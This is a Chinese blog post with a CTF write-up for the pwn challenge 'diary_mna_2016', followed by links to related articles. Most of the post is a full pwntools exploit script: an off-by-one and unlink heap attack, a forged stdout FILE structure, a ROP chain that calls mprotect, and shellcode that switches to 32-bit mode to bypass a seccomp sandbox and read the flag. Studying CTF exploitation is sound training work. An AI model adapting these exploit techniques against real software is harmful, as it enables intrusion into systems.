diary_mna_2016

最新推荐文章于 2024-07-25 08:32:20 发布
最新推荐文章于 2024-07-25 08:32:20 发布
阅读量381 收藏
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/107571498
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

diary_mna_2016

首先,检查一下程序的保护机制

然后检查一下沙箱机制,发现禁用了execve还有open函数,但是没有堆sys_number的范围进行判断,因此,可以利用retf切换到32位模式绕过沙箱。

然后,我们用IDA分析一下,输入函数存在off by one。

程序自己用链表实现了一个堆块管理器。

其free功能使用的是unlink,将堆块取出、合并等操作,但是缺少链表完整性检查

 

这里,我们unlink不能直接将got表修改为system_addr的地址,因为这里unlink的操作,要保证fd和bk都为可写的地址。因此,一个好的方法是设置fd为bss上stdout指针的地址-x10,设置bk为一个堆地址,这样,unlink以后stdout指针被修改为一个堆地址,我们只需要在堆里伪造好_IO_2_1_stdout_结构体即可。

由于heap是使用mmap映射出来的,因此,其地址靠近lib地址

但是其地址与libc地址的偏移在本地和远程是不一样的,但是可以在一个范围内爆破。爆破方法见我的这篇文章https://blog.csdn.net/seaaseesa/article/details/107072062

#coding:utf8
from pwn import *

#sh = process('./diary_mna_2016',env={'LD_PRELOAD':'./libc-2.23.so'})
#sh = remote('node3.buuoj.cn',26394)
#sh = remote('127.0.0.1',8666)
libc = ELF('./libc-2.23.so')
#libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
stdout_bss_addr = 0x00000000006020F0

def add(index,size,content,line = True):
   sh.sendlineafter('>>','1')
   sh.sendlineafter('Input date','1970/01/' + str(index).rjust(2,'0'))
   sh.sendlineafter('size',str(size))
   if line:
      sh.sendlineafter('happened on',content)
   else:
      sh.sendafter('happened on',content)

def show(index):
   sh.sendlineafter('>>','2')
   sh.sendlineafter('Input date','1970/01/' + str(index).rjust(2,'0'))

def delete(index):
   sh.sendlineafter('>>','3')
   sh.sendlineafter('Input date','1970/01/' + str(index).rjust(2,'0'))

def exploit(offset):
   add(1,0x200,'a'*0xFF)
   add(2,0x100,'b'*0xFF)
   add(3,0x60,'c'*0x10)
   add(4,0x120,'d'*0x10)
   add(5,0x60,'e'*0x10)
   delete(2)

   add(2,0x100,'b',False)
   show(2)
   sh.recvuntil('\n')
   heap_addr = u64(sh.recv(6).ljust(8,'\x00')) ^ ord('b')
   libc_base = heap_addr - offset
   pop_rdi = libc_base + 0x0000000000021102
   pop_rsi = libc_base + 0x00000000000202e8
   pop_rdx = libc_base + 0x0000000000001b92
   pop_rax = libc_base + 0x0000000000033544
   jmp_rdi = libc_base + 0x000000000006caa4
   '''pop_rdi = libc_base + 0x0000000000021112
   pop_rsi = libc_base + 0x00000000000202f8
   pop_rdx = libc_base + 0x0000000000001b92
   pop_rax = libc_base + 0x000000000003a738
   jmp_rdi = libc_base + 0x000000000006cab4
   '''
   mprotect_addr = libc_base + libc.sym['mprotect']
   setcontext_x = libc_base + libc.sym['setcontext'] + 0x35
   print 'libc_base=',hex(libc_base)

   fake_file = p64(0) + p64(0)
   fake_file = fake_file.ljust(0x88,'\x00')
   fake_file += p64(heap_addr - 0x4D0)
   fake_file = fake_file.ljust(0xA0,'\x00')
   fake_file += p64(heap_addr - 0x3E8)
   fake_file += p64(pop_rdi)
   fake_file = fake_file.ljust(0xC0,'\x00')
   fake_file += p64(0xFFFFFFFF)
   fake_file += p64(0)*2
   #vtable指针
   fake_file += p64(heap_addr - 0x3F0 - 0x38)

   fake_file += p64(setcontext_x) #vtable

   shellcode_addr = heap_addr + 0x100
   #接下来布置rop,跳到shellcode里去
   fake_file += p64(shellcode_addr) + p64(pop_rsi) + p64(0x200) + p64(pop_rdx) + p64(0x7) + p64(mprotect_addr) + p64(jmp_rdi)

   delete(1)
   add(1,0x200,fake_file)

   #先调用read输入32位shellcode,然后使用retf切换到32位模式,执行32位shellcode
   shellcode = asm('''/*mmap*/
                      mov r9d,0
                      mov r8d,0xFFFFFFFF
                      mov r10,0x22
                      mov edx,7
                      mov esi,0x1000
                      mov edi,0x160000
                      mov eax,9
                      syscall
                      /*write*/
                      mov rax,0x3A7475706E69
                      push rax
                      mov rax,1
                      mov rdi,rax
                      mov rsi,rsp
                      mov rdx,6
                      syscall
                      /*read*/
                      xor rax,rax
                      xor rdi,rdi
                      mov rsi,0x160800
                      mov rdx,0x100
                      syscall
                      /*retf*/
                      xor rsp,rsp
                      mov esp,0x160700
                      mov dword ptr[esp+4],0x23
                      mov dword ptr[esp],0x160800
                      retf
                   ''',arch="amd64")

   add(6,0x200,shellcode)

   delete(3)
   payload = p64(stdout_bss_addr - 0x10) + p64(heap_addr - 0x4D0)
   payload = payload.ljust(0x58,'c')
   payload += p64(0x68) #prev_size
   payload += p8(0x28)
   add(3,0x60,payload,False)
   #unlink修改stdout指针
   delete(4)

   shellcode = asm(shellcraft.open('./flag') + shellcraft.read(3,'esp',0x30) + shellcraft.write(1,'esp',0x30))
   sh.sendafter('input:',shellcode)

for x in range(0xD0,0xFF):
   try:
      global sh
      #sh = process('./diary_mna_2016',env={'LD_PRELOAD':'./libc-2.23.so'})
      sh = remote('node3.buuoj.cn',26394)
      offset = 0x5 << 20 #remote offset=0x5ee500
      offset += x << 12
      offset += 0x500
      print hex(offset)
      exploit(offset)
      sh.interactive()
   except:
      sh.close()
      print 'trying...'

 

ha1vk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
judgement_mna_2016
z1r0的博客
02-16 295
judgement_mna_2016 查看保护 这里有一个格式化字符串,flag也被放到栈上去了。 这题目很简单,flag在栈上,动调一下看一下flag的偏移然后借助格式化打印出来就行了 28的偏移 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27337)
judgement_mna_2016(32位fmt)
m0_51251108的博客
11-05 151
judgement_mna_2016: 32位 逆向分析: main函数: alloca是一个内存分配函数,与malloc,calloc,realloc类似。 _alloca是在栈(stack)上申请空间,用完马上就释放. 输入函数,getline细看: 控制字符,可打印字符 init函数: load_flag函数: 解题: 没思路了,看其他师傅 麻了,原来有个格式化字符串漏洞, 上面大都废话 112/4=32 参考师傅:https://blog.csdn.net/mcmuyanga/art
[BUUCTF-pwn]——judgement_mna_2016
Y_peak的博客
03-31 234
[BUUCTF-pwn]——judgement_mna_2016 还行的一道题, 不过动态调试的时候, 需要你手写一个flag.txt文件, 不然没办法动态调试. 一看就知道这个地方储存的flag, 如果不确定. 可以去看下start函数的汇编, 执行main函数前就已经将flag写入了 下面我们只需要计算偏移输出就好, 记得自己在目录下面写个flag.txt文件, 不然没办法调试的. 偏移0x1c 或者 0x20都可以 exploit from pwn import * #p = process('.
BUUCTF之“judgement_mna_2016
Probeginner的博客
12-22 134
增强漏洞意识,有时候程序复杂但是抓住漏洞
MNA_contractors
03-25
在这个名为"MNA_contractors-master"的压缩包文件中,我们可以预期找到一个与"MNA contractors"相关的网站源代码或项目框架。 HTML允许开发者通过使用各种标签来定义文档结构和内容,如`<head>`、`<body>`、`<h1>`...
Mna:Mna
03-15
很抱歉,但根据您提供的信息,"Mna"的相关知识点无法明确解读。标题和描述中只包含"Mna"这一词汇,没有提供足够的上下文来生成详细的IT知识。标签为空,同样无法提供额外的信息线索。而压缩包子文件的文件名称列表中...
MNA
03-09
【标题】"MNA"可能是指“Mobile Neural Network Accelerator”或者某个特定的项目或框架,但具体信息不足,无法确定。在Java编程语言中,我们通常不会直接遇到"MNA"这样的术语,所以可能需要更详细的上下文来理解其...
四川省宜宾市2015_2016学年高一化学上学期10月月考试题.doc
11-30
14. **相对分子质量和摩尔质量**:某氧气分子的质量为mg,12C原子的质量为ng,该氧气分子的相对分子质量为(m/NA) g/mol,摩尔质量为mNA g/mol,ag该氧气分子的物质的量为(a/mNA) mol,bg该氧气的体积取决于温度和...
mna:货币换算程序
02-14
Mna v1.6.0 版权所有(C)2012-2021 描述 Mna是一个用编写的货币转换器程序,使用库作为用户界面,并使用带有ECB Web服务的库检索更新的数据。 该程序支持种货币的转换。 需要连接到互联网。 数据的可用性和质量,...
[BUUCTF]PWN——judgement_mna_2016(32位fmt)
mcmuyanga的博客
03-18 437
judgement_mna_2016 例行检查,32位程序,开启了canary和nx 运行一下,看看大概的情况 32位ida载入 明显的格式化字符串漏洞,动调看一下输入点的位置,找一下flag在栈上的位置,算一下偏移就能够打印出flag 先找一下输入点参数在栈上的位置 可以看到在oxffffcf4c,然后看一下栈上的布局 发现在距离我们输入的数据的偏移为28和32处存放着flag,定位偏移到该处即可 这题根本不用写exp,但为了水长度,贴一下吧 from pwn import * conte
BUUCTF-PWN刷题记录-10
weixin_44145820的博客
04-19 846
目录wustctf2020_number_game(neg操作原理)zctf2016_note2(强制转换溢出,unlink)wustctf2020_name_your_cat wustctf2020_number_game(neg操作原理) 需要输入一个数,变为负数之后还是负数 这题就设计计组知识了,neg的操作为按位取反+1,而0x80000000取反加一之后仍然是0x80000000,所以...
DDCTF2019-WRITEUP
郁离歌丶的博客
05-04 2901
WEB 滴~ 进去之后就看到url一串base64,解两次是flag.jpg,明显文件读取,读一下index.php,发现居然给了博客。这是恶意引流吧,服了。在出题人博客里面找到.practice.txt.swp,然鹅.practice.txt.swp404了,而practice.txt.swp却能访问???佛了。 内容是f1ag!ddctf.php,然后在index.php的源码里面发现他将co...
PWN简单堆栈溢出漏洞利用(一)
SkYe's Blog
08-12 2257
gets 函数栈溢出 题目来源 下载链接(密码akcz) 题目需要读取flag文件才能正确显示出flag,也就是下文中显示的 This is flag 创建办法: 在/home/pwn/pwn0目录下创建一个名为flag文件,打开并写入This is flag 1. 运行程序、查看文件类型、保护措施 程序让我们输入一段字符串,并返回我们所输入的内容。 看到是一个 32位 动态链接的ELF...
buuctf ciscn_2019_final_5 calloc整理机制修改tcache的fd puts \0泄漏 signal信号
carol2358的博客
08-14 576
ciscn_2019_final_5 有趣的题目 涉及位级操作 漏洞的关键是index为16时,二进制为1 0000 edit 他们都是认heap_ptr里最后一个16进制来判断他是index几的,index1最后一位就是1,2就是2,8就是8,4就是4,但问题是他存储是按照你申请的顺序存的,和这个index没啥关系,漏洞就来了 这题很明显是要你改got表 没有show,就把free改成puts来泄漏 exp: from pwn import * from LibcSearcher import ...
Lianwei 安全周报|2024.07.22
联蔚盘云的博客
07-22 798
新的一周又开始了,以下是本周「Lianwei周报」,我们总结推荐了本周的政策/标准/指南最新动态、热点资讯和安全事件,保证大家不错过本周的每一个重点!
防火墙--内容安全
banliyaoguai的博客
07-20 1247
内容安全是指对互联网上的内容进行监测、筛选和管理,以确保用户在浏览、使用互联网内容时的安全和合法性。各个厂商在进行内容安全的检测、分析和处理的过程被称为引擎。下面以华为IAE引擎来对内容安全进行学习ID:区分不同的签名对象:服务器,客户端。一般我们将发起连接的设备角色认定为客户端,响应连接并提供服务的角色认定为服务器。严重性:该行为一旦爆发之后,对我们网络系统的影响程度的评级协议/应用程序:这种攻击所承载的协议或者应用。
气膜建筑的逃生通道设计与安全保障—轻空间
最新发布
Skansi的博客
07-25 296
确保这类建筑的安全性,尤其是逃生通道的设计,是保障人员生命安全的关键。通过合理设计逃生通道、加强日常维护和应急演练,可以有效提升气膜建筑的安全性,保障人员的生命安全。定期组织应急疏散演练,提高人员逃生意识和技能,确保紧急情况下有序撤离。根据建筑面积和使用人数设计足够的逃生通道,确保人员能够迅速疏散。逃生通道应有清晰的标识和足够的照明,确保在紧急情况下易于找到。材料和结构应具备良好的防火性能,确保通道畅通无阻。逃生通道的宽度和高度应满足疏散需求,避免拥堵。安装应急照明设备和紧急广播系统,引导人员撤离。
探究大语言模型(LLM)漏洞安全优秀实践
java_cjkl的博客
07-21 1146
你可能已听说过LLM强势亮相,至少ChatGPT就是代表。大语言模型(LLM)指语言处理模型。这类模型经过训练,可以执行各种各样的语言任务:翻译、文本生成和问题回答等。有几个LLM家族和架构,最著名的是GPT(生成式预训练Transformer)。每种 LLM都有各自的特定功能,但本文侧重介绍LLM普遍固有的安全问题。随着越来越多的公司集成LLM以增强用户体验或简化和加速内部流程,这种类型的集成特有的新漏洞随之出现。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值